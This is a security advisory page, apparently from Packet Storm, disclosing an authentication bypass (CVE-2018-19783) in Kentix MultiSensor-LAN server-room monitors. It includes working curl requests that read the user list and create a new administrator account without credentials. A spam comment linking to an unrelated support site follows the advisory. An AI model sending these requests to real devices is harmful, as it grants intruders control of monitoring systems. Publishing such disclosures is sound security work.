exploit the possibilities

Kentix MultiSensor-LAN 5.63.00 Authentication Bypass

Kentix MultiSensor-LAN 5.63.00 Authentication Bypass
Posted Jan 18, 2019
Authored by Micha Borrmann

Kentix MultiSensor-LAN versions 5.63.00 and below suffer from an authentication bypass vulnerability. The web based application is not using a usual session concept with a session cookie for managing authenticated user sessions. Some URLs are protected with HTTP Basic Authentication, but the user management web page can be accessed and used without any authentication.

tags | exploit, web, bypass
advisories | CVE-2018-19783
MD5 | 85615421d4b8774b861196ab8f62be4f

Kentix MultiSensor-LAN 5.63.00 Authentication Bypass

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Advisory ID: SYSS-2018-043
Product: MultiSensor-LAN
Manufacturer: Kentix GmbH
Affected Version(s): 5.63.00 <=
Tested Version(s): 5.60.01, 5.63.00
Vulnerability Type: Authentication Bypass Using an Alternate Path or Channel (CWE-288)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2018-12-03
Solution Date: -
Public Disclosure: 2019-01-17
CVE Reference: CVE-2018-19783
Authors of Advisory: Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Kentix MultiSensor LAN is a web-based management solution for monitoring
server rooms (see [1]).

The web site authentication can be bypassed to add another administrator
account.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The web based application is not using a usual session concept with
a session cookie for managing authenticated user sessions. Some URLs
are protected with HTTP Basic Authentication, but the user management
web page can be accessed and used without any authentication.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The current user list can be read out without any authentication (all
values are Base64-encoded) using the following HTTP request:

$ curl --data 'action=0&A05000=1' --url http://$TARGETIP/io
{
"A05001":"YWRtaW4=",
"A05002":"KioqKioq",
"A05003":"",
"A05021":"MASKED",
"A05022":"KioqKioq",
"A05023":"MASKED",
"A05041":"MASKED",
"A05042":"KioqKioq",
"A05043":"MASKED",
"A05061":"",
"A05062":"",
"A05063":"",
"A05081":"",
"A05082":"",
"A05083":""
}

There are five possible accounts, which are represented with the
fields A0500[1-3], A0502[1-3], and so on. The first field is the user
name, the second is the masked password, and the last one is the
optional e-mail address.

With the following simple HTTP request another user account is
created (username and password are sent Base64-encoded, too):

$ curl --data 'action=1&A05061=MWJj&A05062=MWJj&save=3' --url http://$TARGETIP/io
{
"A05061":"MWJj",
"A05062":"KioqKioq"
}

With this created account, the web interface can be used very easily.
It can be verified that the user account was added successfully via
the previously shown HTTP request:

$ curl --data 'action=0&A05000=1' --url http://$TARGETIP/io
{
"A05001":"YWRtaW4=",
"A05002":"KioqKioq",
"A05003":"",
"A05021":"MASKED",
"A05022":"KioqKioq",
"A05023":"MASKED",
"A05041":"MASKED",
"A05042":"KioqKioq",
"A05043":"MASKED",
"A05061":"MWJj",
"A05062":"KioqKioq",
"A05063":"",
"A05081":"",
"A05082":"",
"A05083":""
}

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

As there was no response from the vendor, SySS GmbH is not aware of a
solution for this security issue.

Kentix MultiSensor LAN devices should be operated only in firewall
protected LANs with enabled network access control to reduce the risk
of unauthorized manipulations.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-11-30: Detection of the vulnerability
2018-12-01: CVE number assigned
2018-12-03: Vulnerability reported to manufacturer
2019-01-17: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:
[1] Support web site
https://kentix.com/en/download-support/software-manuals-for-devices-until-01-2018/
[2] SySS Security Advisory SYSS-2018-043
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-043.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Micha Borrmann of SySS GmbH.

E-Mail: micha.borrmann (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory
may be updated in order to provide as accurate information as
possible. The latest version of this security advisory is available on
the SySS Web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE8ufGpZlQhO161g3U7b4m5xTqWHYFAlxAXiUACgkQ7b4m5xTq
WHZDug//cLSK7kjGDW3YSMDS7sCiJRtAl1gCPcdsPVgCaLpBnBp8aNKsylJhLxtc
AF72qpiB38PXpuuMz8MwbI8pGlsc31paZkGms/JJTuwrXfumX5YtbNRtjhgXDvmS
Si5JSvepH6zGRxfYihIFUAS/dchCa16zf4rCkyhCPKntPnk13eW0RkTYdX498PYv
oa8L2QZo2O0sADuwddpWi9CtFV+VQuaY70BUyNS/B2q/otPEuPog33o+8AW2xx0c
GNlahErbot48ZQTiwkGeBXDpP/kKWv8ccbY5dey1d4X53+X0zktKqhrYvTk2evGI
F7o1JzwpT7QhpS4ZFFY6Oc2ve/6CV6wZaQyXmrjKoW9yEKMDkoiAVl5ppDYIF4iS
NzKhiKOwlhyYrl1Ro4uZLSP92ePyxkEjjEwzEdXqXytQEB4Og1LhpHHmBKhBbr/V
yYfg3e9Mg+GOh7CDRiHl1tCI1+03c4Sz3pQE8oC3xsyy/jv5gj4GO44LtlYy2xxo
LDiw8/N0oPukjVrbFhtA8RX7fIOk/ZSsMhaj3Eca1SKantsHPxORCeXrcmkWom3v
H2WR1TFEXWfCTURsilW5Blifh2b47es/qhtZ6NeeDGQOPlFtf6/fnDd/N89qcLMz
USTQ5csy3Pr3ipLBWYtR2t/PSowoNyoWaE6O4d5LTfe1OtiIS1g=
=sH2y
-----END PGP SIGNATURE-----

Comments (1)

RSS Feed Subscribe to this comment feed
joeroot321

I also have use Kentix MultiSensor-LAN versions 5.63.00, but I think that was some difficult process to handle, that's why I decide to go www.routersupports.co/netgear-extender-su… for help, they told me how to solve the problem.

Comment by joeroot321
2019-01-22 04:43:57 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    18 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close